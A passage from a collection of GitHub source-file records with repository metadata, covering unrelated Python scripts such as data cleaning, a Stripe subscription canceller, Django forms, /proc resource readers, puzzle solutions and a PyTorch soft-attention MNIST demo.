re.match(\"(?i)dfs?$\", pre_token):\n source = infer_dfs(source, params[\"df\"])\n elif op_name == \"create\" and pre_token == \"roles\":\n source = infer_roles(source)\n elif op_name == \"create\" and re.match(\"(?i)cifs?$\", pre_token):\n source = create_cifs(source, subsubarg)\n else: # apply a normal op_tk operation\n source = transform_source(source, Mapper(op_name, pre_token, subsubarg, params))\n if op_name == \"delete\":\n # After a delete operation, remove any [] that may have been left behind\n # (it's too tedious to remove them from the AST, and it's not worth it).\n source = re.sub(r\" *\\[\\]\", \" \", source)\n return source\n","repo_name":"laowantong/mocodo","sub_path":"mocodo/rewrite/op_tk.py","file_name":"op_tk.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"31"} +{"seq_id":"24248271304","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 28 15:24:50 2021\n\n@author: Seong\n\"\"\"\n\nimport pandas as pd\n\ndf = pd.read_csv('glassdoor_jobs.csv')\n\n\n\n\n\n\n\n#salary parsing\ndf['hourly'] = df['Salary Estimate'].apply(lambda x: 1 if 'per hour' in x.lower() else 0)\ndf['employer_provided'] = df['Salary Estimate'].apply(lambda x: 1 if 'employer provided salary' in x.lower() else 0)\ndf = df[df['Salary Estimate'] != '-1']\nSalary = df['Salary Estimate'].apply(lambda x: x.split('(')[0])\nminus_Kd = Salary.apply(lambda x: x.replace('K', '').replace('$',''))\n\nminus_hr = minus_Kd.apply(lambda x: x.lower().replace('per hour', '').replace('employer provided salary:', ''))\n\ndf['min_salary'] = minus_hr.apply(lambda x: int(x.split('-')[0]) if '-' in x else x)\ndf['max_salary'] = minus_hr.apply(lambda x: int(x.split('-')[1]) if '-' in x else x)\ndf['average_salary'] = (df.min_salary.astype(int) + df.max_salary.astype(int))/2\n\n#Removing \"-1\" Ratings\ndf = df[df['Rating'] != -1]\n\n\n#state field\ndf['job_state'] = df['Location'].apply(lambda x: x.split(',')[1] if ',' in x else x)\n\n#Clean up \"Founded\" and calculate age of the company\ndf['company_age'] = df.Founded.apply(lambda x: 0 if x <1 else 2021 - x)\n\n#Parsing job description\ndf['Job Description'][0]\n\n#python\ndf['python'] = df['Job Description'].apply(lambda x: 1 if 'python' in x.lower() else 0)\n\n#R studio\ndf['R studio'] = df['Job Description'].apply(lambda x: 1 if 'r studio' in x.lower() or 'r-studio' in x.lower() else 0)\n\n#SQL\ndf['SQL'] = df['Job Description'].apply(lambda x: 1 if 'SQL' in x.lower() else 0)\n\n#Power BI\ndf['Power BI'] = df['Job Description'].apply(lambda x: 1 if 'Power BI' in x.lower() else 0)\n\n#excel\ndf['Excel'] = df['Job Description'].apply(lambda x: 1 if 'Excel' in x.lower() else 0)\n\ndf.to_csv('salary_data_cleaned.csv')\n","repo_name":"SNamStar/ds_salary_proj","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1050628676","text":"#!/usr/bin/python\n\nimport sys, getopt\n\nif __name__ == \"__main__\":\n argv=sys.argv[1:]\n inputfile = ''\n outputfile = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n print('test.py -i -o ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('test.py -i -o ')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n# print('Input file is \"', inputfile)\n# print('Output file is \"', outputfile)\n\n input = open(inputfile,\"r\")\n output = open(outputfile,\"w\")\n\n count = 0;\n\n lines = input.readlines()\n\n output.write(' '+'\\n')\n for line in lines:\n if count%2==0:\n output.write(line.rstrip('\\n')+ \" \")\n if count%2==1:\n output.write(line)\n sequence_length=(len(line) - line.count(' ')-line.count('\\n'))\n if line.isspace() == False:\n count+=1\n\n input.close()\n output.close()\n\n output = open(outputfile,\"r+\")\n output.write(str(count/2)+' '+str(sequence_length))\n output.close()\n\n","repo_name":"jeremy0jiang/SRIP","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28378370787","text":"def solution(board, moves):\n answer = 0\n stack = []\n \n for i in range(len(moves)):\n check = moves[i] - 1;\n for j in range(len(board)):\n if board[j][check] != 0:\n if stack and stack[-1] == board[j][check]:\n stack.pop()\n answer += 2\n\n else:\n stack.append(board[j][check])\n\n board[j][check] = 0\n break;\n \n return answer\n\n\nboard = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\nmoves = [1, 5, 3, 5, 1, 2, 1, 4]\n\nprint(solution(board, moves))","repo_name":"lordloop4700/Playground","sub_path":"python/crain.py","file_name":"crain.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35115384500","text":"import eg\nfrom eg.Classes.UndoHandler import UndoHandlerBase\n\nclass Clear(UndoHandlerBase):\n name = eg.text.MainFrame.Menu.Delete.replace(\"&\", \"\")\n\n @eg.AssertInMainThread\n @eg.LogIt\n def Do(self, item):\n if not item.CanDelete() or not item.AskDelete():\n return\n self.data = item.GetFullXml()\n self.treePosition = eg.TreePosition(item)\n eg.actionThread.Func(item.Delete)()\n self.document.AppendUndoHandler(self)\n\n @eg.AssertInActionThread\n def Redo(self):\n self.treePosition.GetItem().Delete()\n\n @eg.AssertInActionThread\n def Undo(self):\n item = self.document.RestoreItem(self.treePosition, self.data)\n item.Select()\n","repo_name":"EventGhost/EventGhost","sub_path":"eg/Classes/UndoHandler/Clear.py","file_name":"Clear.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"31"} +{"seq_id":"41860021331","text":"import csv\nimport logging\n\nimport stripe\nfrom environs import Env\n\n### Setup\n\nlogger = logging.getLogger()\nlogger.setLevel(\"INFO\")\nformatter = logging.Formatter(fmt=\"%(levelname)s %(name)s/%(module)s:%(lineno)d - %(message)s\")\nconsole = logging.StreamHandler()\nconsole.setFormatter(formatter)\nlogger.addHandler(console)\n\nenv = Env()\nenv.read_env()\n\nstripe.api_key = env(\"STRIPE_KEY\")\n\n### Process the CSV\n\nwith open(\"subscriptions.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(f\"processing record for {row['email']} (${row['amount']} each {row['interval']})...\")\n\n print(f\"canceling the Stripe subscription {row['subscription_id']}...\")\n stripe.Subscription.delete(row[\"subscription_id\"])\n","repo_name":"newsrevenuehub/stripe-subscriptions-migrator","sub_path":"cancel.py","file_name":"cancel.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13161040791","text":"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass LTM_transfer(nn.Module):\n def __init__(self,md=4, stride=1):\n super(LTM_transfer, self).__init__()\n self.md = md #displacement (default = 4pixels)\n self.range = (md*2 + 1) ** 2 #(default = (4x2+1)**2 = 81)\n self.grid = None\n self.Channelwise_sum = None\n\n d_u = torch.linspace(-self.md * stride, self.md * stride, 2 * self.md + 1).view(1, -1).repeat((2 * self.md + 1, 1)).view(self.range, 1) # (25,1)\n d_v = torch.linspace(-self.md * stride, self.md * stride, 2 * self.md + 1).view(-1, 1).repeat((1, 2 * self.md + 1)).view(self.range, 1) # (25,1)\n self.d = torch.cat((d_u, d_v), dim=1).cuda() # (25,2)\n\n def L2normalize(self, x, d=1):\n eps = 1e-6\n norm = x ** 2\n norm = norm.sum(dim=d, keepdim=True) + eps\n norm = norm ** (0.5)\n return (x/norm)\n\n def UniformGrid(self, Input):\n '''\n Make uniform grid\n :param Input: tensor(N,C,H,W)\n :return grid: (1,2,H,W)\n '''\n # torchHorizontal = torch.linspace(-1.0, 1.0, W).view(1, 1, 1, W).expand(N, 1, H, W)\n # torchVertical = torch.linspace(-1.0, 1.0, H).view(1, 1, H, 1).expand(N, 1, H, W)\n # grid = torch.cat([torchHorizontal, torchVertical], 1).cuda()\n\n _, _, H, W = Input.size()\n # mesh grid\n xx = torch.arange(0, W).view(1, 1, 1, W).expand(1, 1, H, W)\n yy = torch.arange(0, H).view(1, 1, H, 1).expand(1, 1, H, W)\n\n grid = torch.cat((xx, yy), 1).float()\n\n if Input.is_cuda:\n grid = grid.cuda()\n\n return grid\n\n def warp(self, x, BM_d):\n vgrid = self.grid + BM_d # [N2HW] # [(2d+1)^2, 2, H, W]\n # scale grid to [-1,1]\n vgrid[:, 0, :, :] = 2.0 * vgrid[:, 0, :, :] / max(x.size(3) - 1, 1) - 1.0\n vgrid[:, 1, :, :] = 2.0 * vgrid[:, 1, :, :] / max(x.size(2) - 1, 1) - 1.0\n\n vgrid = vgrid.permute(0, 2, 3, 1)\n output = nn.functional.grid_sample(x, vgrid, mode='bilinear', padding_mode = 'border') #800MB memory occupied (d=2,C=64,H=256,W=256)\n mask = torch.autograd.Variable(torch.ones(x.size())).cuda()\n mask = nn.functional.grid_sample(mask, vgrid) #300MB memory occpied (d=2,C=64,H=256,W=256)\n\n mask = mask.masked_fill_(mask<0.999,0)\n mask = mask.masked_fill_(mask>0,1)\n\n return output * mask\n\n def forward(self,sim_feature, f_map, apply_softmax_on_simfeature = True):\n '''\n Return bilateral cost volume(Set of bilateral correlation map)\n :param sim_feature: Correlation feature based on operating frame's HW (N,D2,H,W)\n :param f_map: Previous frame mask (N,1,H,W)\n :return Correlation Cost: (N,(2d+1)^2,H,W)\n '''\n # feature1 = self.L2normalize(feature1)\n # feature2 = self.L2normalize(feature2)\n\n B_size,C_size,H_size,W_size = f_map.size()\n\n if self.grid is None:\n # Initialize first uniform grid\n self.grid = self.UniformGrid(f_map)\n\n if H_size != self.grid.size(2) or W_size != self.grid.size(3):\n # Update uniform grid to fit on input tensor shape\n self.grid = self.UniformGrid(f_map)\n\n\n # Displacement volume (N,(2d+1)^2,2,H,W) d = (i,j) , i in [-md,md] & j in [-md,md]\n D_vol = self.d.view(self.range, 2, 1, 1).expand(-1, -1, H_size, W_size) # [(2d+1)^2, 2, H, W]\n\n if apply_softmax_on_simfeature:\n sim_feature = F.softmax(sim_feature, dim=1) # B,D^2,H,W\n f_map = self.warp(f_map.transpose(0, 1).expand(self.range,-1,-1,-1), D_vol).transpose(0, 1) # B,D^2,H,W\n\n f_map = torch.sum(torch.mul(sim_feature, f_map),dim=1, keepdim=True) # B,1,H,W\n\n return f_map # B,1,H,W\n","repo_name":"yuk6heo/IVOS-ATNet","sub_path":"networks/ltm_transfer.py","file_name":"ltm_transfer.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"31"} +{"seq_id":"3374492697","text":"class Solution:\n def grayCode(self, n):\n maxval = 2 ** n - 1\n self.res = []\n def dfs(n, cur, maxval):\n if len(cur) == maxval + 1:\n self.res= cur[:]\n return\n if self.res != []:\n return\n cand = [1 << i ^ cur[-1] for i in range(n)]\n cand = [i for i in cand if i not in cur]\n for i in cand:\n cur.append(i)\n dfs(n, cur, maxval)\n cur.pop()\n\n path = [0]\n\n dfs(n, path, maxval)\n return self.res\n\n\nsol = Solution()\nprint(sol.grayCode(5))\n","repo_name":"hxl163630/practice","sub_path":"89. Gray Code.py","file_name":"89. Gray Code.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40753936537","text":"from builtins import str\nfrom builtins import object\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .helpers import is_user_paid\nfrom events.models import *\nfrom training.models import *\nfrom .validators import validate_csv_file\n\nclass CreateTrainingEventForm(forms.ModelForm):\n courses = FossCategory.objects.filter(id__in=CourseMap.objects.filter(category=0, test=1).values('foss_id'))\n\n\n foss = forms.ModelChoiceField(empty_label='---------', queryset=courses)\n\n event_coordinator_email = forms.CharField(required = False)\n event_coordinator_contact_no = forms.CharField(required = False)\n class Meta(object):\n model = TrainingEvents\n exclude = ['entry_user', 'training_status', 'Language_of_workshop']\n \n\nclass RegisterUser(forms.ModelForm):\n \n state = forms.ModelChoiceField(\n widget = forms.Select(attrs = {'class' : 'ac-state'}),\n queryset = State.objects.order_by('name'),\n empty_label = \"--- Select State ---\", \n help_text = \"\",\n required=True,\n )\n college = forms.CharField(\n required = False,\n error_messages = {'required': 'component type is required.'},\n )\n foss_language = forms.ModelChoiceField(\n queryset = Language.objects.order_by('name'),\n required = False,\n help_text = \"You can listen to the FOSS in the above Indian languages\"\n )\n phone = forms.RegexField(regex=r'^\\+?1?\\d{8,15}$', error_messages = {'required': 'Enter valid phone number.'},)\n class Meta(object):\n model = Participant\n fields = ['name', 'email', 'state', 'gender', 'amount', 'foss_language']\n\n def __init__(self, *args, **kwargs):\n super(RegisterUser, self).__init__(*args, **kwargs)\n self.fields['amount'].required = False\n\nclass UploadParticipantsForm(forms.ModelForm):\n csv_file = forms.FileField(required=True)\n\n class Meta(object):\n model = Participant\n fields = ['registartion_type']\n \n def clean_csv_file(self):\n data = self.cleaned_data[\"csv_file\"]\n file_data = validate_csv_file(data)\n return file_data\n\nclass UploadCollegeForm(forms.ModelForm):\n csv_file = forms.FileField(required=True)\n\n class Meta(object):\n model = AcademicPaymentStatus\n exclude = ['entry_user']\n \n def clean_csv_file(self):\n data = self.cleaned_data[\"csv_file\"]\n file_data = validate_csv_file(data)\n return file_data\n\nclass TrainingManagerPaymentForm(forms.Form):\n state = forms.ChoiceField(choices=[('', '-- None --'), ], widget=forms.Select(attrs = {}), required = False)\n college = forms.ChoiceField(choices=[('0', '-- None --'), ], widget=forms.Select(attrs = {}), required = False)\n status = forms.ChoiceField(choices=[('', '-- None --'), ('S', 'Successfull'), ('F', 'Failed'),('X','Undefined')], required = False)\n request_type = forms.ChoiceField(choices=[('', '-- None --'), ('I', 'Initiated at Bank'), ('R', 'Reconciled')], required = False)\n fdate = forms.DateTimeField(required = False)\n tdate = forms.DateTimeField(required = False)\n events = forms.ChoiceField(choices=[('', '-- None --'), ], widget=forms.Select(attrs = {}), required = False)\n user_email = forms.EmailField(max_length = 200, required = False)\n userid = forms.IntegerField(required = False)\n def __init__(self, user,*args, **kwargs):\n initial = ''\n if 'instance' in kwargs:\n initial = kwargs[\"instance\"]\n del kwargs[\"instance\"]\n\n if 'user' in kwargs:\n user = kwargs[\"user\"]\n del kwargs[\"user\"]\n\n super(TrainingManagerPaymentForm, self).__init__(*args, **kwargs)\n \n\n rp_states = ResourcePerson.objects.filter(status=1,user=user)\n # load the choices\n state_list = list(State.objects.filter(id__in=rp_states.values('state')).order_by('name').values_list('id', 'name'))\n state_list.insert(0, ('', '-- None --'))\n self.fields['state'].choices = state_list\n\n centre_choices =[]\n centre_choices.insert(0,(0,'All Colleges'))\n\n event_choices = []\n event_choices.insert(0,(0,'All Events'))\n \n if args:\n if 'state' in args[0]:\n if args[0]['state'] and args[0]['state'] != '' and args[0]['state'] != 'None':\n centre_qs = AcademicCenter.objects.filter(state_id=args[0]['state']).order_by('institution_name')\n centre_choices = [(x.id, '%s, %s' % (x.institution_name, x.academic_code)) for x in centre_qs]\n centre_choices.insert(0,(0,'All Colleges'))\n self.fields['college'].choices = centre_choices\n self.fields['college'].widget.attrs = {}\n\n if 'college' in args[0]:\n if args[0]['college'] and args[0]['college'] != '' and args[0]['college'] != 'None':\n event_qs = TrainingEvents.objects.filter(host_college_id=args[0]['college']).order_by('event_name')\n event_choices = [(x.id, '%s, %s' % (x.event_name, x.event_type)) for x in event_qs]\n event_choices.insert(0,(0,'All Events'))\n self.fields['events'].choices = event_choices\n self.fields['events'].widget.attrs = {}\n\n\n\n\n","repo_name":"Spoken-tutorial/spoken-website","sub_path":"training/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"42088641738","text":"import resource\nimport time\nimport platform\n\n\ndef get_rlimit_nofile():\n soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)\n return {\"soft\": soft, \"hard\": hard}\n\n\ndef get_platform_info():\n try:\n uname = platform.uname()\n platform_info = {\n \"system\": uname.system,\n \"version\": uname.version,\n \"release\": uname.release,\n \"machine\": uname.machine,\n \"processor\": uname.processor\n }\n except:\n platform_info = {}\n try:\n with open('/proc/cpuinfo') as f:\n cpu_count = 0\n model = None\n for line in f:\n # Ignore the blank line separating the information between\n # details about two processing units\n if line.strip():\n if line.rstrip('\\n').startswith('model name'):\n model_name = line.rstrip('\\n').split(':')[1]\n model = model_name\n model = model.strip()\n cpu_count += 1\n platform_info['model'] = model\n platform_info['cores'] = cpu_count\n except Exception as e:\n print(e)\n return platform_info\n\n\ndef get_cpu_load():\n with open('/proc/loadavg') as f:\n cpu_load = f.read()\n cpu_load_result = cpu_load.split(\" \")\n return {\n \"1min\": cpu_load_result[0],\n \"5min\": cpu_load_result[1],\n \"15min\": cpu_load_result[2],\n }\n\n\ndef get_mem_info(unit=\"GB\"):\n \"\"\"\n Read in the /proc/meminfo and return a dictionary of the memory and swap\n usage for all processes.\n \"\"\"\n\n if unit == \"MB\":\n convert_unit = 1000\n elif unit == \"GB\":\n convert_unit = 1000 * 1000\n else:\n convert_unit = 1\n unit = \"KB\"\n\n data = {'mem_total': 0, 'mem_used': 0, 'mem_free': 0,\n 'swap_total': 0, 'swap_used': 0, 'swap_free': 0,\n 'buffers': 0, 'cached': 0}\n\n with open('/proc/meminfo', 'r') as fh:\n lines = fh.read()\n fh.close()\n\n for line in lines.split('\\n'):\n fields = line.split(None, 2)\n if fields[0] == 'MemTotal:':\n data['mem_total'] = int(fields[1], 10)\n elif fields[0] == 'MemFree:':\n data['mem_free'] = int(fields[1], 10)\n elif fields[0] == 'Buffers:':\n data['buffers'] = int(fields[1], 10)\n elif fields[0] == 'Cached:':\n data['cached'] = int(fields[1], 10)\n elif fields[0] == 'SwapTotal:':\n data['swap_total'] = int(fields[1], 10)\n elif fields[0] == 'SwapFree:':\n data['swap_free'] = int(fields[1], 10)\n break\n data['mem_used'] = data['mem_total'] - data['mem_free']\n data['swap_used'] = data['swap_total'] - data['swap_free']\n\n for k, v in data.items():\n if isinstance(v, int):\n data[k] = round(v / convert_unit, 2)\n data['unit'] = unit\n\n return data\n\n\ndef get_cpu_time():\n cpu_infos = {}\n with open('/proc/stat', 'r') as file_stat:\n cpu_lines = []\n for lines in file_stat.readlines():\n for line in lines.split('\\n'):\n if line.startswith('cpu'):\n cpu_lines.append(line.split(' '))\n for cpu_line in cpu_lines:\n if '' in cpu_line:\n cpu_line.remove('') # First row(cpu) exist '' and Remove ''\n cpu_id = cpu_line[0]\n cpu_line = [float(item) for item in cpu_line[1:]]\n user, nice, system, idle, iowait, irq, softirq, steal, guest, guest_nice = cpu_line\n\n idle_time = idle + iowait\n non_idle_time = user + nice + system + irq + softirq + steal\n total = idle_time + non_idle_time\n\n cpu_infos.update({cpu_id: {'total': total, 'idle': idle_time}})\n return cpu_infos\n\n\ndef get_cpu_usage_percentage():\n start = get_cpu_time()\n time.sleep(1)\n end = get_cpu_time()\n\n cpu_usages = {}\n for cpu in start:\n diff_total = end[cpu]['total'] - start[cpu]['total']\n diff_idle = end[cpu]['idle'] - start[cpu]['idle']\n # diff_iowait = end[cpu]['iowait'] - start[cpu]['iowait']\n cpu_usage_percentage = (diff_total - diff_idle) / diff_total * 100\n cpu_usages.update({cpu: round(cpu_usage_percentage, 2)})\n return cpu_usages\n","repo_name":"icon-project/icon2-docker","sub_path":"ctx/common/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"32894762597","text":"#!/user/bin/env python\n\"\"\"Google Code Jam 2008: Problem C. Egg Drop\"\"\"\n\nfrom builtins import input\n\ntable = {}\n\ndef main():\n N = int(input())\n if N < 1 or N > 100:\n raise RuntimeError(\"N is not within the valid range\")\n for i in range(N):\n F,D,B = map(int, input().split())\n r = EggDrop(F,D,B)\n print(\"Case #\" + str(i + 1) + \": \" + r)\n\ndef EggDrop(F,D,B):\n f = maxF(D,B)\n if f >= 2**32:\n f = -1\n return ( str(f) + \" \" + str(minD(F,B)) + \" \" + str(minB(F,D)))\n\ndef maxF(D, B):\n if table.get((D,B), 0) != 0:\n return table[(D,B)]\n if B >= D:\n table[(D,B)] = (2**D)-1\n return (2**D)-1\n if B == 1:\n table[(D,B)] = D\n return D\n table[(D,B)] = maxF(D-1,B) + maxF(D-1, B-1) + 1\n return table[D,B]\n\ndef minD(F, B):\n if B == 1:\n return F\n d = 1\n while maxF(d,B) < F:\n d += 1\n return d \n\ndef minB(F, D):\n b = 1\n while maxF(D,b) < F:\n b += 1\n return b\n\n\nif __name__==\"__main__\":\n main()\n","repo_name":"xx3nvyxx/challenges","sub_path":"codejam/2008/Practice Problems/C/EggDrop.py","file_name":"EggDrop.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37987680416","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nfrom torchvision import datasets\nimport torchvision.transforms as tvtransforms\n\nimport streamlit as st\n\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\nclass HardMNIST(datasets.MNIST):\n def __init__(self, root, img_output_shape, noise_level_max, noise_char_max, pos_x, pos_y, digit_out_size, bg_digits,\n train=True, transform=None, target_transform=None, download=False):\n super(HardMNIST, self).__init__(root, train=train, transform=transform, target_transform=target_transform,\n download=download)\n # transformation parameters\n self.img_output_shape = img_output_shape # new output size (still quadratic)\n self.noise_level_max = noise_level_max # max. percentage of additive Gaussian noise\n self.noise_char_max = noise_char_max # max. perentage of salt'n'pepper digit noise\n self.max_rotation = 45 # includes pos and negative directions\n self.max_non_trgts = 10 # maximum number of non-target digits in the background\n self.posx = pos_x\n self.posy = pos_y\n self.digit_out_size = digit_out_size\n self.bg_digits = bg_digits\n # store PIL images of mnist digits\n self.pil_imgs = list()\n for i in range(len(self.data)):\n self.pil_imgs.append(tvtransforms.ToPILImage()(self.data[i]).convert())\n\n def transform_mnist(self, idx, new_size=28, noise=0.5,\n sp_noise=0.1, rotate=0, intensity=1.0):\n # digit_img = transforms.ToPILImage()(img).convert()\n digit_img = self.pil_imgs[idx]\n digit_img = digit_img.rotate(rotate, expand=True)\n digit_img = digit_img.resize((new_size, new_size))\n digit_img = torch.Tensor(digit_img.getdata()).float().view(new_size, new_size)\n\n digit_img *= intensity\n digit_img += 255. * noise * torch.rand(new_size, new_size)\n digit_img[digit_img > 255.] = 255.\n\n num_pixels = np.int(new_size * new_size * sp_noise)\n pixels = np.random.permutation(new_size * new_size)[:num_pixels]\n\n pixels2d = np.unravel_index(pixels, (new_size, new_size))\n if sp_noise > 1e-3:\n rnd_img = 255. * noise * torch.rand(new_size, new_size)\n digit_img[pixels2d] = rnd_img[pixels2d]\n return digit_img\n\n def __getitem__(self, index):\n target = int(self.targets[index])\n non_trgt_inds = np.where(self.targets != target)[0]\n\n # select some non-target background digits\n non_trgts = self.bg_digits\n non_trgt_inds = np.random.permutation(non_trgt_inds)[:non_trgts]\n\n # background noise level\n noise_level = self.noise_level_max * np.random.rand()\n new_img = 255. * noise_level * torch.rand(self.img_output_shape, self.img_output_shape)\n\n for ind in non_trgt_inds:\n # noise_char_level = np.max([0.25, np.random.rand()])\n noise_char_level = 0.\n rotation = 2 * self.max_rotation * np.random.rand() - self.max_rotation + 180\n # scale this mnist digit img to this size\n digit_size = np.max([20, np.int(self.img_output_shape / 4 * np.random.rand())])\n digit_img = self.transform_mnist(ind,\n new_size=digit_size,\n noise=noise_level,\n sp_noise=noise_char_level,\n rotate=rotation,\n intensity=0.65)\n pos_x = np.int((self.img_output_shape - digit_size) * np.random.rand())\n pos_y = np.int((self.img_output_shape - digit_size) * np.random.rand())\n new_img[pos_y:pos_y + digit_size, pos_x:pos_x + digit_size] = digit_img\n # new_img[pos_y:pos_y + digit_size, pos_x:pos_x + digit_size] /= 2.\n\n noise_char_level = self.noise_char_max * np.random.rand()\n digit_size = self.digit_out_size\n digit_img = self.transform_mnist(index,\n new_size=digit_size,\n noise=noise_level,\n sp_noise=noise_char_level, rotate=0)\n\n pos_x = np.min([self.posx, self.img_output_shape - digit_size])\n pos_y = np.min([self.posy, self.img_output_shape - digit_size])\n new_img[pos_y:pos_y + digit_size, pos_x:pos_x + digit_size] = digit_img\n\n new_img /= 256.\n final_img = Image.fromarray(new_img.numpy(), mode='F').resize((self.img_output_shape, self.img_output_shape))\n\n if self.transform is not None:\n final_img = self.transform(final_img)\n return final_img, target\n\n\nclass SoftAttnClassifier(nn.Module):\n\n def __init__(self, img_output_shape, att_scale=10.):\n super(SoftAttnClassifier, self).__init__()\n self.att_scale = att_scale\n self.img_size = img_output_shape\n self.mask_size = np.int(self.img_size / 2.)\n # Feature extractor\n self.fe = nn.Sequential(\n nn.Conv2d(1, 16, 5, 1, 2),\n nn.BatchNorm2d(16),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(16, 32, 5, 1, 2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, 2),\n )\n # Upsample layer\n self.upsample = nn.Sequential(\n # upsample part\n nn.Upsample(size=(self.mask_size, self.mask_size), mode='nearest'),\n nn.Conv2d(32, 4, 1, 1),\n nn.BatchNorm2d(4),\n )\n # Classifier\n self.classifier = nn.Sequential(\n nn.Linear(4 * self.mask_size * self.mask_size, 500, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(500, 10, bias=False),\n nn.LogSoftmax(dim=1),\n )\n # Attention sub-net\n self.fc_attn_size = np.int(self.img_size / 2. / 2.)\n self.foo_1 = torch.arange(0, self.mask_size, device='cpu', dtype=torch.get_default_dtype())[None,\n :] / np.float(\n self.mask_size)\n self.attn_conv = nn.Conv2d(32, 1, 1, 1)\n self.attn = nn.Sequential(\n nn.Linear(self.fc_attn_size * self.fc_attn_size, 500, bias=True),\n nn.Sigmoid(),\n nn.Linear(500, 4, bias=True),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n xs = self.fe(x)\n self.mask, self.theta = self.attention(xs)\n xs = self.upsample(xs)\n # (Hadarmad product: feature map * attention mask\n # xy' * mask = diag_x mask diag_y)\n y = xs * self.mask\n self.glimpse = y\n z = y.view(-1, self.mask_size * self.mask_size * 4)\n return self.classifier(z), self.theta[:, 2:]\n\n def attention(self, x):\n num_samples = x.size()[0]\n foo = self.foo_1.repeat(num_samples, 1)\n z = self.attn_conv(x)\n z = self.attn(z.view(-1, self.fc_attn_size * self.fc_attn_size))\n\n loc_x = z[:, 0].view(-1, 1).repeat(1, self.mask_size)\n loc_y = z[:, 1].view(-1, 1).repeat(1, self.mask_size)\n\n sigma_x = z[:, 2].view(-1, 1).repeat(1, self.mask_size)\n sigma_y = z[:, 3].view(-1, 1).repeat(1, self.mask_size)\n\n x_vec = torch.exp(-(foo - loc_x) * (foo - loc_x) / sigma_x)\n y_vec = torch.exp(-(foo - loc_y) * (foo - loc_y) / sigma_y)\n\n a_x = x_vec.div(x_vec.sum(dim=1).view(-1, 1).repeat(1, self.mask_size) / self.att_scale)\n a_y = y_vec.div(y_vec.sum(dim=1).view(-1, 1).repeat(1, self.mask_size) / self.att_scale)\n xa = torch.matmul(a_x.view(-1, self.mask_size, 1),\n a_y.view(-1, 1, self.mask_size)).view(\n -1, 1, self.mask_size, self.mask_size)\n return xa, z\n\n\ndef get_activation(activation, name):\n def hook(model, input, output):\n activation[name] = output.detach()\n return hook\n\n\ndef load_model(img_output_shape):\n model = SoftAttnClassifier(img_output_shape).to('cpu')\n model.load_state_dict(torch.load(\"soft-attn/weights.pt\", map_location=torch.device('cpu')))\n model.eval()\n return model\n\n\nimg_output_shape = 100\nimg_noise_level = 1\n\nparam_choice = st.selectbox('Choose the class label', [*np.arange(10).tolist()])\n\nparam_size = st.slider('Digit size', 20, img_output_shape-1, 25, step=1)\nmax_pos = img_output_shape - param_size\nparam_posx = st.slider('Horizontal position', 0, max_pos, min([30, max_pos]), step=1)\nparam_posy = st.slider('Vertical position', 0, max_pos, min([40, max_pos]), step=1)\nparam_bg_digits = st.slider('Number of background noise digits', 0, 10, 10, step=1)\n\n# param_noise_level = st.slider('Background noise level', 0., 1., 0.5, step=0.01)\n# param_noise_char = st.slider('Digit noise level', 0., 1., 0., step=0.01)\n\nparam_noise_level = 0.95\nparam_noise_char = 0.\n\nmodel = load_model(img_output_shape)\n\ntransforms = tvtransforms.Compose([tvtransforms.ToTensor(), tvtransforms.Normalize((0.13,), (0.3,))])\ndata = HardMNIST('soft-attn/data', img_output_shape, param_noise_level, param_noise_char,\n pos_x=param_posx, pos_y=param_posy, digit_out_size=param_size, bg_digits=param_bg_digits,\n train=True, download=True, transform=transforms)\n\n# Visualize feature maps\nfig = plt.figure(figsize=(9, 2), dpi=200, facecolor='w', edgecolor='k')\ntrgts = data.targets\ninds = np.where(np.array(trgts) == param_choice)[0]\nsamples = 1\ncnt = 1\nfor i in range(samples):\n img, target = data.__getitem__(inds[i])\n\n input = img.view(1, 1, 100, 100)\n\n outputs, _ = model(input) # 